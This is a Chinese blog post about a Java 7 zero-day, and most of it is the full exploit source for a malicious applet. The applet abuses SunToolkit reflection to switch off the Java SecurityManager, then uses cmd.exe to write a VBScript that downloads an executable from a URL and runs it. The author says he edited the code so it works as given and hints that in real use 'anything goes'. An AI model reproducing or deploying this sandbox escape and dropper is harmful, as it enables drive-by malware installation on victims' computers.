这篇日志发布时间已经超过一年,许多内容可能已经失效,请读者酌情参考。
昨天看到Java的0Day。。。然后看到有EXP放出。。。然后下载测试。。。尼玛太可怕了。。
此次0Day只影响JDK1.7,对于1.6以下版本无影响。
坑爹啊,前几个月在写Swing,因为JDK1.7修了1.6的几个关于透明和不规则窗体的问题才更新到JDK1.7,现在就躺枪了....
EXP如下:
import java.applet.Applet; import java.awt.Graphics; import java.beans.Expression; import java.beans.Statement; import java.lang.reflect.Field; import java.net.URL; import java.security.*; import java.security.cert.Certificate; public class Gondvv extends Applet { public Gondvv() { } public void disableSecurity() throws Throwable { Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]); Permissions localPermissions = new Permissions(); localPermissions.add(new AllPermission()); ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions); AccessControlContext localAccessControlContext = new AccessControlContext( new ProtectionDomain[] { localProtectionDomain }); SetField(Statement.class, "acc", localStatement, localAccessControlContext); localStatement.execute(); } private Class GetClass(String paramString) throws Throwable { Object arrayOfObject[] = new Object[1]; arrayOfObject[0] = paramString; Expression localExpression = new Expression(Class.class, "forName", arrayOfObject); localExpression.execute(); return (Class) localExpression.getValue(); } private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2) throws Throwable { Object arrayOfObject[] = new Object[2]; arrayOfObject[0] = paramClass; arrayOfObject[1] = paramString; Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject); localExpression.execute(); ((Field) localExpression.getValue()).set(paramObject1, paramObject2); } public void init() { try { disableSecurity(); Process localProcess = null; String command = "cmd.exe /c echo Const adTypeBinary = 1 > d:\\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> d:\\apsou.vbs & echo Dim BinaryStream >> d:\\apsou.vbs & echo Set BinaryStream = CreateObject(\"ADODB.Stream\") >> d:\\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> d:\\apsou.vbs & echo BinaryStream.Open >> d:\\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> d:\\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> d:\\apsou.vbs & echo Function BinaryGetURL(URL) >> d:\\apsou.vbs & echo Dim Http >> d:\\apsou.vbs & echo Set Http = CreateObject(\"WinHttp.WinHttpRequest.5.1\") >> d:\\apsou.vbs & echo Http.Open \"GET\", URL, False >> d:\\apsou.vbs & echo Http.Send >> d:\\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> d:\\apsou.vbs & echo End Function >> d:\\apsou.vbs & echo Set shell = CreateObject(\"WScript.Shell\") >> d:\\apsou.vbs & echo shell.Run \"d:\\update.exe\" >> d:\\apsou.vbs " + "& start d:\\apsou.vbs http://localhost/cmd.exe d:\\update.exe"; localProcess = Runtime.getRuntime().exec(command); if (localProcess != null) ; localProcess.waitFor(); } catch (Throwable localThrowable) { localThrowable.printStackTrace(); } } public void paint(Graphics paramGraphics) { paramGraphics.drawString("Loading", 50, 25); } }
EXP中使用的是cmd生成了一个VBS脚本,然后用VBS脚本去下载木马文件并运行。方式不够隐蔽仅作演示使用,会被安全软件拦截(至少Comodo拦截了。。。),当然在实际使用的时候就可以随意了。。。你想都可以用cmd了,还有什么不可以。。。
昨晚看到的原文在这里:
最新Java 0day漏洞分析及EXP下载
EXP在这里:Java 0Day EXP
上边的EXP中vbs和java代码中的几个路径和使用方法不一致,我做了下简单的修改,实际使用还可以做更多的改动。。。。但是,记得点到为止。
留言交流